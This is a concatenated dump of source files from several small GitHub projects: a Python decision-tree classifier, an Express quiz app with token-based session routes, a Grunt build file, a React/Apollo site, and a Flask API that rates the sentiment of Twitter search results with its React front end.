    print(trainingInstances == trainingInstances.copy())
    rootNode = buildTree(trainingInstances.copy(), attributes.copy())
    rootNode.report("")
    classifyTestInstances(rootNode)
    classifyUsingBaseline()

main()
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 18:34:53 2019
@author: <NAME>
"""
class DecisionTree:
def __init__():
print()<file_sep># How to execute
- Clone the repository (or fork it on GitHub first)
- Open your terminal from the project's directory
- Run the following command:
> python mainDT.py hepatitis-training.dat hepatitis-test.dat
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 18:34:53 2019
@author: <NAME>
"""
class Node:
    """Internal decision node testing one boolean attribute.

    _left is followed when the attribute value is "true",
    _right when it is "false".
    """
    def __init__(self, attribute, left, right):
        self._attribute = attribute
        self._left = left
        self._right = right

    def report(self, indent):
        # Pretty-print this subtree, one extra indent level per depth.
        print(indent + self._attribute + " = True:")
        self._left.report(indent+"|  ");
        print(indent + self._attribute + " = False:")
        self._right.report(indent+"|  ");

    @property
    def getAttribute(self):
        # Read as `node.getAttribute` (no call): the split attribute name.
        return self._attribute
class LeafNode:
    """Leaf: a predicted class label plus its estimated probability."""
    def __init__(self, classification, probability):
        self._classification = classification
        self._probability = probability

    def report(self, indent):
        # One line per leaf: class label and probability to 2 decimals.
        print(str(indent) + "Class: " + str(self._classification) + " /|\ Prob = " + "{0:.2f}".format(self._probability))
class Instance:
    """A single data row: [class_label, attr1_value, attr2_value, ...]."""

    def __init__(self, attributes):
        # Store the raw token list; index 0 is the class label.
        # (A stray bare `return` was removed — it had no effect.)
        self._attributes = attributes

    @property
    def attributeList(self):
        """The raw attribute tokens, class label first."""
        return self._attributes
"Markdown",
"Python"
] | 4 | Python | alistairgraham/Decision-Tree-Algorithm | 73a61a37642d048c7e0da8148aa097804e91d530 | 6e84250f5e065dde603cac51156d3a8f683e61c3 |
refs/heads/master | <file_sep>// Determine whether navbar would occlude canvas.
// If not: Show it!
// Show the navbar only when it fits below the quiz canvas without
// occluding it; otherwise keep it folded.
function unfoldNavbarIfPossible () {
  var canvasHeight = $("section.quizpage")[0].offsetHeight;
  // css("margin-top") returns e.g. "20px": strip the unit, then parse.
  // Fix: pass the radix explicitly so parseInt always parses base 10.
  var canvasMarginTop = parseInt($(".app-container").css("margin-top").split("px")[0], 10);
  var viewportHeight = window.innerHeight;
  var navbarHeight = $(".nvg")[0].offsetHeight + $(".nvg-counter")[0].offsetHeight;
  if (viewportHeight - (canvasHeight + canvasMarginTop) > navbarHeight) {
    $(".nvg").addClass("nvg-unfold");
  } else {
    $(".nvg").removeClass("nvg-unfold");
  }
}
$(function(){
  // Centered owl-carousel for the image navigation; the number of
  // visible items scales with the viewport width.
  var carousel = $("#navcarousel").owlCarousel({
    center: true,
    items: 13,
    margin: 20,
    responsive: {
      0: {
        items: 1
      },
      320: {
        items: 3
      },
      768: {
        items: 5
      },
      992: {
        items: 7
      },
      1170: {
        items: 9
      }
    },
    startPosition: 2
  });
  // Initial fold state + keep it in sync with window resizes.
  unfoldNavbarIfPossible();
  $(window).resize(unfoldNavbarIfPossible);
  // Scrolling always folds the navbar away.
  $(document).on("scroll", function(){
    $(".nvg").removeClass("nvg-unfold");
  });
  $(".nvg-counter").on("click touchstart",function(){
    $(".nvg").toggleClass("nvg-unfold");
  })
  .on("mouseover", function(){
    $(".nvg").addClass("nvg-unfold");
  });
  $(".nvg-directions_arrow-left").on("click touch", function(){
    carousel.trigger("prev.owl.carousel");
  });
  $(".nvg-directions_arrow-right").on("click touch", function(){
    carousel.trigger("next.owl.carousel");
  });
  // Clicking a thumbnail selects it and centers the carousel on it.
  $(".owl-item").on("click touch", function(){
    var index = $(this).index();
    $(".nvg-imgList_item.selected").removeClass("selected").addClass("unselected");
    $(this).find(".nvg-imgList_item").removeClass("unselected").addClass("selected");
    carousel.trigger("to.owl.carousel", index);
  });
  // Placeholder: intentionally empty orientation/resize hook.
  $(window).on("resize orientationChange", function(){
  });
});<file_sep># Allgäu or not?
Green hills, mountains, wooden huts, cows - things Germans usually associate with an alpine region called [Allgäu](http://www.allgaeu.de) ("Ull-goy"). But in fact these things exist everywhere in the world. Or is it half the world copying this magnificently beautiful area that happens to be my home region?
So here's the test: Can you separate the wheat from the chaff? Are these pictures from Allgäu - or not?
### About this package
This repository contains the node app that serves the *Allgäu or not* quiz. It will soon be hosted under http://allgaeu.mgschoen.de.<file_sep>function authenticate() {
var apiTicket = $('#wrapper').attr('data-api-ticket');
var signature = md5(apiTicket + navigator.userAgent);
$.ajax({
method: 'POST',
url: '/session/auth/' + signature + '/',
data: {}
}).done(function(response){
$('#response-wrapper').text(response.accessToken);
});
}<file_sep>var express = require('express');
var md5 = require('md5');
var router = express.Router();
// POST: No signature provided
// POST /session/auth without a signature: always reject.
router.post('/', (req, res) => {
  res.send('Authentication failed');
});
/** Authentication route for Session API.
* If the client submits a correct signature to this route,
* an access token is generated, stored and returned to the
* client.
* For more information on the authentication process see
* the documentation.
*/
router.post('/:sig', function(req, res) {
  var db = req.db;
  var hashCollection = db.get('sessions.hashes');
  var submittedSignature = req.params.sig;
  // Search for submitted signature
  hashCollection.find({
    'signature': submittedSignature
  }, function(e,result){
    if (e === null) {
      // Is signature unique?
      if (result.length === 1) {
        var ticket = result[0].ticket;
        // Is ticket younger than 60 seconds?
        var ticketCreationDate = result[0].creationDate.valueOf();
        var now = new Date().valueOf();
        // 60000 ms = the ticket's 60-second time-to-live.
        if ((now - ticketCreationDate) < 60000) {
          // Remove used ticket and signature from hash collection
          hashCollection.remove({'signature': submittedSignature}, function (f) {
            if (f === null) {
              // Generate new access token and insert it to tokens collection
              var tokenCollection = db.get('sessions.tokens');
              var accessToken = md5((new Date()).valueOf().toString() + Math.random().toString());
              tokenCollection.insert({
                'accessToken': accessToken,
                'creationDate': new Date(),
                'signature': submittedSignature
              }, {}, function (g) {
                if (g === null) {
                  // Respond with access token
                  res.json({
                    'success': true,
                    'accessToken': accessToken,
                    'message': 'Authentication success, ticket ' + ticket + ' consumed'
                  });
                  return true;
                } else {
                  // Storing Token failed
                  // jsonError: error-payload helper defined elsewhere in this file.
                  console.error('[ERROR] Error storing access token');
                  res.json(jsonError('Internal server error. Please try again'));
                  return false;
                }
              });
            } else {
              // Removing hash failed
              console.error('[ERROR] Error removing ticket ' + ticket + ' from hash collection');
              res.json(jsonError('Internal server error. Please try again'));
              return false;
            }
          });
        } else {
          // Ticket timed out: best-effort cleanup, then reject.
          console.log('[INFO] Ticket ' + ticket + ' has already timed out. Incoming connection refused.');
          hashCollection.remove({'signature': submittedSignature}, function (h) {
            if (h !== null) {
              console.error('[ERROR] Failed to remove ticket from hash collection');
            }
          });
          res.json(jsonError('Ticket timed out, authentication failed'));
          return false;
        }
      }
      else if (result.length > 1) {
        // Signature not unique
        console.error('[ERROR] Signature ' + submittedSignature + ' is not unique!');
        res.json(jsonError('Internal server error. Please try again'));
        return false;
      } else {
        // Signature not found
        console.log('[INFO] Authentication request rejected: Signature ' + submittedSignature + ' was not found.');
        res.json(jsonError('Signature incorrect, authentication failed'));
        return false;
      }
    } else {
      // Other (database) error
      console.error('[ERROR] ' + e.message);
      res.json(jsonError('Internal server error. Please try again'));
    }
  });
});
/** Create a new hash consisting of ticket, signature and timestamp
 * and insert it to the database. This method is exported.
 * @param hashCollection - monk collection object
 * @param individualString - string that together with the ticket gets hashed to the signature
 * @param callback - function to execute when insertion was performed
 */
var insertHash = function (hashCollection, individualString, callback) {
    // Ticket: md5 over current time + random number.
    // Signature: md5 over ticket + caller-specific string.
    var ticket = md5(String(new Date().valueOf()) + String(Math.random()));
    var hash = {
        creationDate: new Date(),
        signature: md5(ticket + individualString),
        ticket: ticket
    };
    hashCollection.insert(hash, function (insertErr) {
        if (insertErr !== null) {
            callback({ msg: 'Failed to write to database' }, hash);
            return;
        }
        callback(null, hash);
    });
};
/** Check if a token is a valid access token, e. g. it is
 * part of the mongo collection sessions.tokens and it was not
 * created more than 24 hours ago. This method is exported.
 * Expired tokens are removed from the collection as a side effect.
 * @param tokensCollection - monk collection object
 * @param token - md5 hashed string
 * @param callback - function(error, valid) to execute after validation;
 *                   error is null or an object shaped like jsonError()
 */
var isValidAccessToken = function (tokensCollection, token, callback) {
    tokensCollection.find({
        'accessToken': token
    }, function(e,result){
        if (e === null) {
            if (result.length === 1) {
                // Is token younger than 24 hours (86400000 ms)?
                var tokenCreationDate = result[0].creationDate.valueOf();
                var now = new Date().valueOf();
                if ((now - tokenCreationDate) < 86400000) {
                    // Token valid
                    callback(null, true);
                    return true;
                } else {
                    // Token timed out -- reject, then remove it lazily.
                    console.log('[INFO] Token ' + token + ' has already timed out. Incoming connection refused.');
                    callback(jsonError('Token timed out'), false);
                    tokensCollection.remove({
                        'accessToken': token
                    }, function (f) {
                        if (f !== null) {
                            // Removing token failed.
                            // We log this but don't care any further because the
                            // cronjob will take care of this zombie token.
                            console.error('[ERROR] Failed to remove token ' + token);
                            return false;
                        }
                        // Removing token successful
                        return true;
                    });
                }
            } else if (result.length > 1) {
                // Token not unique -- should never happen; treated as error.
                console.error('[ERROR] Access token ' + token + ' is not unique');
                callback(jsonError('Access token ' + token + ' is not unique'), false);
                return false;
            } else {
                // Token not found
                console.log('[INFO] Authentication request rejected: Access token ' + token + ' was not found.');
                callback(jsonError('Invalid token'), false);
                return false;
            }
        } else {
            // Other error while querying the tokens collection
            console.error('[ERROR] Error validating token: ' + e.message);
            callback(jsonError('Error validating token: ' + e.message), false);
            return false;
        }
    });
}
// Build the standard API error payload for the given message.
var jsonError = function (message) {
    return {
        success: false,
        message: message
    };
};
module.exports = {
'router': router,
'insertHash': insertHash,
'isValidAccessToken': isValidAccessToken
};
<file_sep>/*global module:false*/
module.exports = function(grunt) {

  // Project configuration.
  grunt.initConfig({
    // Metadata.
    pkg: grunt.file.readJSON('package.json'),
    // Banner prepended to concatenated/minified build artifacts.
    banner: '/*! <%= pkg.title || pkg.name %> - v<%= pkg.version %> - ' +
      '<%= grunt.template.today("yyyy-mm-dd") %>\n' +
      '<%= pkg.homepage ? "* " + pkg.homepage + "\\n" : "" %>' +
      '* Copyright (c) <%= grunt.template.today("yyyy") %> <%= pkg.author.name %>; */\n',
    // Task configuration.
    // concat: join all dev scripts into a single bundle.
    concat: {
      options: {
        banner: '<%= banner %>',
        stripBanners: true
      },
      dist: {
        src: ['dev/javascripts/js/*.js'],
        dest: 'dev/javascripts/concatenated/<%= pkg.name %>.js'
      }
    },
    // uglify: minify the concatenated bundle.
    uglify: {
      options: {
        banner: '<%= banner %>'
      },
      dist: {
        src: '<%= concat.dist.dest %>',
        dest: 'dev/javascripts/compiled/<%= pkg.name %>.min.js'
      }
    },
    // copy: move build artifacts and third-party assets into public/.
    copy: {
      css: {
        src: 'dev/stylesheets/compiled/style.css',
        dest: 'public/stylesheets/style.css',
        options: {
          // Strip the sourceMappingURL comment from the shipped CSS.
          process: function (content) {
            return content.replace(/\n\n\/\*# sourceMappingURL=.*\.css\.map \*\//g, '');
          }
        }
      },
      js: {
        src: '<%= uglify.dist.dest %>',
        dest: 'public/javascripts/<%= pkg.name %>.min.js'
      },
      md5: {
        src: 'node_modules/js-md5/build/md5.min.js',
        dest: 'public/plugins/js-md5/md5.min.js'
      },
      owlcarousel: {
        expand: true,
        cwd: 'node_modules/owl.carousel/dist/',
        src: '**',
        dest: 'public/plugins/owl-carousel/'
      }
    },
    // jshint: lint the Gruntfile itself.
    jshint: {
      options: {
        curly: true,
        eqeqeq: true,
        immed: true,
        latedef: true,
        newcap: true,
        noarg: true,
        sub: true,
        undef: true,
        unused: true,
        boss: true,
        eqnull: true,
        browser: true,
        globals: {}
      },
      gruntfile: {
        src: 'Gruntfile.js'
      }
    },
    // postcss: run autoprefixer over the compiled stylesheet.
    postcss: {
      options: {
        processors: [
          require('autoprefixer')
        ]
      },
      dist: {
        src: 'dev/stylesheets/compiled/style.css'
      }
    },
    // sass: compile SCSS sources (incrementally, via update).
    sass: {
      dist: {
        options: {
          update: true
        },
        files: {
          'dev/stylesheets/compiled/style.css': 'dev/stylesheets/scss/main.scss'
        }
      }
    },
    // watch: rebuild the relevant pipeline when sources change.
    watch: {
      gruntfile: {
        files: '<%= jshint.gruntfile.src %>',
        tasks: ['jshint:gruntfile']
      },
      stylesheets: {
        files: ['dev/stylesheets/scss/*.scss'],
        tasks: ['sass', 'postcss', 'copy:css']
      },
      javascripts: {
        files: ['dev/javascripts/js/*.js'],
        tasks: ['concat', 'uglify', 'copy:js']
      }
    }
  });

  // These plugins provide necessary tasks.
  grunt.loadNpmTasks('grunt-contrib-concat');
  grunt.loadNpmTasks('grunt-contrib-copy');
  grunt.loadNpmTasks('grunt-contrib-uglify');
  grunt.loadNpmTasks('grunt-contrib-jshint');
  grunt.loadNpmTasks('grunt-contrib-sass');
  grunt.loadNpmTasks('grunt-contrib-watch');
  grunt.loadNpmTasks('grunt-postcss');

  // Default task. Builds static .css and .js files.
  grunt.registerTask('default', ['sass', 'concat', 'uglify', 'copy']);
};
<file_sep>var auth = require('./auth.js');
var express = require('express');
var router = express.Router();
const VALID_ANSWER_VALUES = ['yes','no',null];
// POST to the bare session route is not part of the API: always reject.
router.post('/', function (request, response) {
    response.send('Authentication failed');
});
// GET /session/:token -- plain validity check for an access token.
router.get('/:token', function (req, res) {
    var tokensCollection = req.db.get('sessions.tokens');
    auth.isValidAccessToken(tokensCollection, req.params.token, function (err, valid) {
        if (err !== null) {
            res.json({
                success: false,
                message: err.message
            });
            return;
        }
        if (!valid) {
            res.json({
                success: false,
                message: 'There has been an error processing your request'
            });
            return;
        }
        res.json({
            success: true,
            message: 'Congrats! Your access token is totally valid'
        });
    });
});
/** Start a new session by GET-ing /session/:token/start
 * This route creates a new user session on the server side,
 * saves it to the database and responds with a JSON-object
 * containing info about the session.
 * The session gets one (initially null) answer slot for every
 * document in the content collection.
 */
router.get('/:token/start', function(req,res){
    var db = req.db;
    var contentCollection = db.get('content');
    var sessionCollection = db.get('sessions');
    var tokensCollection = db.get('sessions.tokens');
    // Skeleton of the session to create; answers are filled in below.
    var sessionToInsert = {
        'answers': {},
        'closed': null,
        'started': new Date(),
        'status': 'in-progress'
    };
    // Validate access token
    auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
        // Token valid
        if (e === null && valid) {
            try {
                // Determine all currently available content documents (e.g. quiz questions)
                contentCollection.find({}, function(f,docs){
                    if (f === null) {
                        // Add each document's id to the answers object of the new session
                        for (var i = 0; i < docs.length; i++) {
                            sessionToInsert.answers[docs[i]._id] = null;
                        }
                        // Store the new session in mongo collection sessions
                        sessionCollection.insert(sessionToInsert, function(g){
                            if (g === null) {
                                // Respond with info about the generated session
                                res.json({
                                    'message': '',
                                    'session': sessionToInsert,
                                    'success': true
                                });
                                return true;
                            } else {
                                // Error inserting session to collection
                                console.error('[ERROR] ' + g.message);
                                res.json({
                                    'success': false,
                                    'message': g.message
                                });
                                return false;
                            }
                        });
                    } else {
                        // Error searching collection
                        console.error('[ERROR] ' + f.message);
                        res.json({
                            'success': false,
                            'message': f.message
                        });
                        return false;
                    }
                });
            } catch (g) {
                console.error('[ERROR] Error starting session: ' + g.message);
                // BUG FIX: this response previously read `f.message`, but `f` is
                // not in scope inside this catch block (it is a callback
                // parameter above) -- report the caught exception instead.
                res.json({
                    'success': false,
                    'message': 'Error starting session: ' + g.message
                });
                return false;
            }
        // Authentication errors
        } else if (e === null) {
            res.json({
                'success': false,
                'message': 'There has been an error processing your request'
            });
        } else {
            res.json({
                'success': false,
                'message': e.message
            });
        }
    });
});
/** Retrieve session object by GET-ing /session/:token/get/:id
 * This route responds with the database entry of the session with
 * the specified ID. If no such session exists, it responds with an
 * error object. Closed sessions can still be read through this route.
 */
router.get('/:token/get/:id', function(req,res){
    var db = req.db;
    var sessionsCollection = db.get('sessions');
    var tokensCollection = db.get('sessions.tokens');
    var idToGet = req.params.id;
    // Validate access token
    auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
        // Token valid?
        if (e === null && valid) {
            try {
                // Search for provided ID in sessions collection
                sessionsCollection.find({
                    '_id': idToGet
                }, function(f, result){
                    if (f === null) {
                        var numResults = result.length;
                        if (numResults === 1) {
                            // Session found
                            // Respond with JSON object of session
                            res.json({
                                'message': '',
                                'session': result[0],
                                'success': true
                            });
                            return true;
                        } else if (numResults > 1) {
                            // Session not unique -- should never happen; server error.
                            console.error('[ERROR] Session duplicate found: Found ' + numResults + ' sessions with ID ' + idToGet);
                            res.json({
                                'success': false,
                                'message': 'Internal server error. Please try again.'
                            });
                            return false;
                        } else {
                            // Session not found -- not an error, reported to the client.
                            res.json({
                                'success': false,
                                'message': 'Session with ID ' + idToGet + ' does not exist.'
                            });
                            return true;
                        }
                    } else {
                        // Error searching collection
                        console.error('[ERROR] ' + f.message);
                        res.json({
                            'success': false,
                            'message': f.message
                        });
                        return false;
                    }
                });
            } catch (g) {
                // Error searching collection
                console.error('[ERROR] ' + g.message);
                res.json({
                    'success': false,
                    'message': g.message
                });
                return false;
            }
        // Authentication errors
        } else if (e === null) {
            res.json({
                'success': false,
                'message': 'There has been an error processing your request'
            });
        } else {
            res.json({
                'success': false,
                'message': e.message
            });
        }
    });
});
/** In a specified session, update the value of an existing answer or
 * set a new answer value by POST-ing to
 *
 *      /session/:token/set/:sid/answer/:aid/val/:value
 *
 * where
 *
 *      :token is the access token,
 *      :sid   is the ID of the session to change,
 *      :aid   is the ID of the answer to change and
 *      :value is the new value the answer should get assigned
 *             (must be one of VALID_ANSWER_VALUES).
 *
 * In case of success, this route responds with the updated session
 * object. Otherwise it responds with an error object.
 */
router.post('/:token/set/:sid/answer/:aid/val/:value', function(req,res){
    var db = req.db;
    var sessionsCollection = db.get('sessions');
    var tokensCollection = db.get('sessions.tokens');
    var submittedSessionID = req.params.sid;
    var submittedAnswerID = req.params.aid;
    var submittedAnswerVal = req.params.value;
    // Validate access token
    auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
        if (e === null && valid) {
            // Answer IDs are mongo ObjectIDs: exactly 24 lowercase hex chars.
            var regexMongoID = /^([a-f]|[0-9]){24}$/;
            if (!regexMongoID.test(submittedAnswerID)) {
                console.log('[ERROR] Submitted answer ID ' + submittedAnswerID + ' is invalid');
                res.json({
                    'success': false,
                    // BUG FIX: this message previously said "Submitted answer value".
                    'message': 'Submitted answer ID ' + submittedAnswerID + ' is invalid'
                });
                return false;
            }
            if (VALID_ANSWER_VALUES.indexOf(submittedAnswerVal) === -1) {
                console.log('[ERROR] Submitted answer value ' + submittedAnswerVal + ' is invalid');
                res.json({
                    'success': false,
                    'message': 'Submitted answer value ' + submittedAnswerVal + ' is invalid'
                });
                return false;
            }
            try {
                // Search for session
                sessionsCollection.findOne(
                    { '_id': submittedSessionID },
                    function (f, sessionFound) {
                        if (f !== null) {
                            // Error searching for session
                            console.error('[ERROR] Error searching collection: ' + f.message);
                            res.json({
                                'success': false,
                                'message': 'Internal server error. Please try again.'
                            });
                            return false;
                        }
                        if (sessionFound === null) {
                            // No session found
                            console.error('[ERROR] Session with ID ' + submittedSessionID + ' was not found.');
                            res.json({
                                'success': false,
                                'message': 'Session with ID ' + submittedSessionID + ' was not found'
                            });
                            return false;
                        }
                        if (sessionFound.status === 'closed') {
                            // Closed sessions are immutable.
                            console.error('[ERROR] Session with ID ' + submittedSessionID + ' is already closed. Edit request rejected.');
                            res.json({
                                'success': false,
                                'message': 'Session with ID ' + submittedSessionID + ' is already closed and can not be edited'
                            });
                            return false;
                        }
                        // Update only the single targeted answer field.
                        var updateQuery = {};
                        updateQuery['answers.' + submittedAnswerID] = submittedAnswerVal;
                        sessionsCollection.findOneAndUpdate(
                            {'_id': submittedSessionID},
                            {$set: updateQuery},
                            function (g, updatedSession) {
                                if (g === null) {
                                    res.json({
                                        'message': '',
                                        'session': updatedSession,
                                        'success': true
                                    });
                                    return true;
                                }
                                // BUG FIX: these two lines previously read `e.message`,
                                // but `e` is the (null) auth error in this branch, which
                                // crashed the handler -- `g` is the update error.
                                console.log('[ERROR] Error while setting answer value: ' + g.message);
                                res.json({
                                    'success': false,
                                    'message': 'Error while setting answer value: ' + g.message
                                });
                                return false;
                            }
                        );
                    }
                );
            } catch (h) {
                // Exception while accessing database
                console.error('[ERROR] ' + h.message);
                res.json({
                    'success': false,
                    'message': h.message
                });
                return false;
            }
        // Authentication errors
        } else if (e === null) {
            res.json({
                'success': false,
                'message': 'There has been an error processing your request'
            });
        } else {
            res.json({
                'success': false,
                'message': e.message
            });
        }
    });
});
/** Close an existing session by POST-ing to /session/:token/set/:id/close
 * This route changes the status of a session to 'closed'
 * and saves the current time as time of termination. A
 * closed session cannot be changed any further. However,
 * it can still be read by GET-ing the /session/:token/get/:id
 * route.
 */
router.post('/:token/set/:id/close', function(req,res){
    var db = req.db;
    var sessionsCollection = db.get('sessions');
    var tokensCollection = db.get('sessions.tokens');
    var submittedSessionID = req.params.id;
    // Validate access token
    auth.isValidAccessToken(tokensCollection, req.params.token, function(e, valid){
        if (e === null && valid) {
            try {
                // Search for session
                sessionsCollection.findOne(
                    { '_id': submittedSessionID },
                    function (f, sessionFound) {
                        if (f !== null) {
                            // Error searching for session
                            console.error('[ERROR] Error searching collection: ' + f.message);
                            res.json({
                                'success': false,
                                'message': 'Internal server error. Please try again.'
                            });
                            return false;
                        }
                        if (sessionFound === null) {
                            // No session found
                            console.error('[ERROR] Session with ID ' + submittedSessionID + ' was not found.');
                            res.json({
                                'success': false,
                                'message': 'Session with ID ' + submittedSessionID + ' was not found'
                            });
                            return false;
                        }
                        if (sessionFound.status === 'closed') {
                            // Session already closed -- closing is not idempotent by design.
                            console.error('[ERROR] Session with ID ' + submittedSessionID + ' is already closed. Close request rejected.');
                            res.json({
                                'success': false,
                                'message': 'Session with ID ' + submittedSessionID + ' is already closed'
                            });
                            return false;
                        }
                        // DB query: set status to closed and current
                        // time as time of session termination
                        var updateQuery = {
                            'closed': new Date(),
                            'status': 'closed'
                        };
                        sessionsCollection.findOneAndUpdate(
                            {'_id': submittedSessionID},
                            {$set: updateQuery},
                            function (g, updatedSession) {
                                if (g === null) {
                                    res.json({
                                        'message': '',
                                        'session': updatedSession,
                                        'success': true
                                    });
                                    return true;
                                }
                                // BUG FIX: these two lines previously read `e.message`,
                                // but `e` is the (null) auth error in this branch --
                                // `g` is the update error.
                                console.log('[ERROR] Error closing session: ' + g.message);
                                res.json({
                                    'success': false,
                                    'message': 'Error closing session: ' + g.message
                                });
                                return false;
                            }
                        );
                    }
                );
            } catch (h) {
                // Exception while accessing database
                console.error('[ERROR] ' + h.message);
                res.json({
                    'success': false,
                    'message': h.message
                });
                return false;
            }
        // Authentication errors
        } else if (e === null) {
            res.json({
                'success': false,
                'message': 'There has been an error processing your request'
            });
        } else {
            res.json({
                'success': false,
                'message': e.message
            });
        }
    });
});
module.exports = {
'auth': auth,
'router': router
};
| 6d2c892575e7335214b1f2f3cf0121af80058a32 | [
"JavaScript",
"Markdown"
] | 6 | JavaScript | mgschoen/allgaeu | aeb22c6832eed2839d03b3027e35567dd315b3b6 | 346684510e1cbd124cd6ade3c59fe1772318bc61 |
refs/heads/master | <file_sep>import React, { Component } from 'react'
import { ApolloProvider } from 'react-apollo'
import { Switch, Route, BrowserRouter as Router } from 'react-router-dom'
import { ThemeProvider } from 'styled-components'
import './index.css'
import theme from './theme'
import client from './client'
import Home from './containers/Home/'
import Ethan from './containers/Ethan/'
// Root component: wires up routing (react-router), theming
// (styled-components) and GraphQL (Apollo) around the page content.
class App extends Component {
  render() {
    return (
      <Router>
        <ThemeProvider theme={theme}>
          <ApolloProvider client={client}>
            <div className="App">
              {/* Plain anchor tags trigger full page reloads; kept as-is. */}
              <div className="NavBar">
                <a href="/">Home</a>
                <a href="/Ethan-Baird">Ethan</a>
              </div>
              <Switch>
                <Route exact path="/" component={Home} />
                <Route path="/Ethan-Baird" component={Ethan} />
              </Switch>
            </div>
          </ApolloProvider>
        </ThemeProvider>
      </Router>
    )
  }
}
export default App
<file_sep>import { ApolloClient } from 'apollo-client'
import { InMemoryCache } from 'apollo-cache-inmemory'
import { ApolloLink } from 'apollo-link'
import { HttpLink } from 'apollo-link-http'
import config from './config'
// Shared Apollo GraphQL client: a plain HTTP link against the endpoint
// configured in ./config, with cookies sent for same-origin requests and
// a normalized in-memory cache.
const client = new ApolloClient({
  link: ApolloLink.from([
    new HttpLink({
      uri: config.graphqlUrl,
      credentials: 'same-origin'
    })
  ]),
  cache: new InMemoryCache()
})

export default client
<file_sep>**Desired Behavior:**
**Preparation:**
**Action Steps:**
- [ ] step 1
- details
<file_sep>import React, { Component } from 'react'
import './index.css'
class Ethan extends Component {
render() {
return (
<div className="Python">
<h>
Hello Python World!
</h>
<p>
I will tell you that this website is the best!
</p>
</div>
)
}
}
export default Ethan | 6a68eac521a9a5a559af1fc772bd8cc8b42a3766 | [
"JavaScript",
"Markdown"
] | 4 | JavaScript | ebaird492/Web2 | 59b8ee6181f5d0fb733f17bb64bcefa085ac11dc | 0dc4f459f2605fbdeed0bbb0ab641ae9b56d9678 |
refs/heads/master | <file_sep>from flask import Flask, request, jsonify
import re, string
import pickle
import requests
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
from nltk.stem.wordnet import WordNetLemmatizer
from flask_cors import CORS, cross_origin
from dotenv import load_dotenv
from PyDictionary import PyDictionary
dictionary=PyDictionary()
load_dotenv()
import os
app = Flask(__name__)
cors = CORS(app)
def remove_noise(tweet_tokens, stop_words = ()):
    """Return lowercased, lemmatized tokens with URLs, @-mentions,
    punctuation and stop words stripped out.

    :param tweet_tokens: list of word tokens from a single tweet
    :param stop_words: iterable of lowercase words to drop
    """
    url_pattern = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|'
                   '(?:%[0-9a-fA-F][0-9a-fA-F]))+')
    mention_pattern = "(@[A-Za-z0-9_]+)"
    lemmatizer = WordNetLemmatizer()
    cleaned = []
    for token, tag in pos_tag(tweet_tokens):
        token = re.sub(url_pattern, '', token)
        token = re.sub(mention_pattern, '', token)
        # Map the Penn Treebank tag onto the WordNet POS the lemmatizer expects.
        if tag.startswith("NN"):
            wordnet_pos = 'n'
        elif tag.startswith('VB'):
            wordnet_pos = 'v'
        else:
            wordnet_pos = 'a'
        token = lemmatizer.lemmatize(token, wordnet_pos)
        if token and token not in string.punctuation and token.lower() not in stop_words:
            cleaned.append(token.lower())
    return cleaned
def getSentiment(query):
    """Fetch up to 100 recent English tweets matching ``query`` and return the
    percentage (0-100) that the pickled NLTK classifier labels 'Positive'.

    Returns 0.0 when the search yields no tweets (previously this raised
    ZeroDivisionError).
    """
    # Load the trained classifier. NOTE: reloading the pickle on every request
    # is wasteful; kept to preserve the existing module-level interface.
    with open('my_classifier.pickle', 'rb') as f:
        classifier = pickle.load(f)

    url = "https://api.twitter.com/1.1/search/tweets.json?q=" + query + "&result_type=mixed&count=100&lang=en&tweet_mode=extended"
    bearerToken = os.environ.get("bearerToken")
    headers = {
        'Authorization': 'Bearer ' + bearerToken,
        'Cookie': 'personalization_id="v1_4uBj+Xmfoj7IhxyR5B/adg=="; guest_id=v1%3A159473130844397528; lang=en'
    }
    response = requests.get(url, headers=headers)

    texts = [tweet['full_text'] for tweet in response.json()['statuses']]
    # BUG FIX: guard against an empty result set before dividing.
    if not texts:
        return 0.0

    nOfPos = 0
    for text in texts:
        custom_tokens = remove_noise(word_tokenize(text))
        if classifier.classify(dict([token, True] for token in custom_tokens)) == 'Positive':
            nOfPos += 1
    return nOfPos / len(texts) * 100
@app.route('/api/v1/search')
def hello():
    """Search endpoint: returns the sentiment for the query plus the
    sentiment of up to five of its synonyms.

    Response JSON: {"percent": float, "simWords": [str], "simPercent": [float]}
    """
    query = request.args['query']
    print(query)
    # Synonyms of the query term. PyDictionary may return None for unknown
    # words -- treat that as "no synonyms" instead of crashing below.
    simWords = dictionary.synonym(query) or []
    # BUG FIX: the original compared the *list* to 5 (``if simWords<5``),
    # which raises TypeError in Python 3. Score at most five synonyms.
    countWords = min(len(simWords), 5)
    simPercent = [getSentiment(simWords[i]) for i in range(countWords)]
    percent = getSentiment(query)
    return jsonify({"percent": percent, "simWords": simWords, "simPercent": simPercent})
if __name__ == '__main__':
app.run(debug=True)<file_sep>import React, {useState, useEffect} from 'react';
import logo from '../../assets/logo.png';
import './Home.css';
// Landing page: a search box that queries the local Flask sentiment API and
// renders the positivity percentage as a colored progress bar.
const Home = () => {
    const [search, setSearch] = useState("");
    const [percent, setPercent] = useState(0.0);
    const [isLoading, setIsLoading] = useState(false);
    const [fillColor , setFillColor] = useState('#39F082');

    // Query the backend for the current search term; color the bar red
    // (<30), orange (<60) or green (>=60) depending on the result.
    // NOTE(review): the response's simWords/simPercent fields are ignored
    // here, and fetch failures only reset the loading flag (no user-visible
    // error) -- confirm that is intended.
    const onSearch = () => {
        setIsLoading(true);
        console.log("Searching...");
        fetch(`http://127.0.0.1:5000/api/v1/search?query=${search}`).then(res => res.json())
        .then((result) => {setPercent(parseFloat(result['percent']));
            if(parseFloat(result['percent']) < 30) {setFillColor("#e74c3c")}
            else if(parseFloat(result['percent']) < 60) {setFillColor("#e67e22")}
            else { setFillColor("#2ecc71")}
            setIsLoading(false);
        })
        .catch((e) => {setIsLoading(false);})
    }

    return (
        <div className="homePage">
            <img className="logoImage" src={logo} alt=""/>
            <input onKeyDown={(e) => { if(e.key === 'Enter'){onSearch();}}} className="searchInput" value={search} onChange={(e) => {setSearch(e.target.value)}} type="text" placeholder="Search a topic"/>
            <div className="bottomContainer">
                <div className="percentContainer">
                    {(isLoading) ? <span className="percentText">Loading...</span> : <span className="percentText">{percent.toFixed(0)}% Positivity</span>}
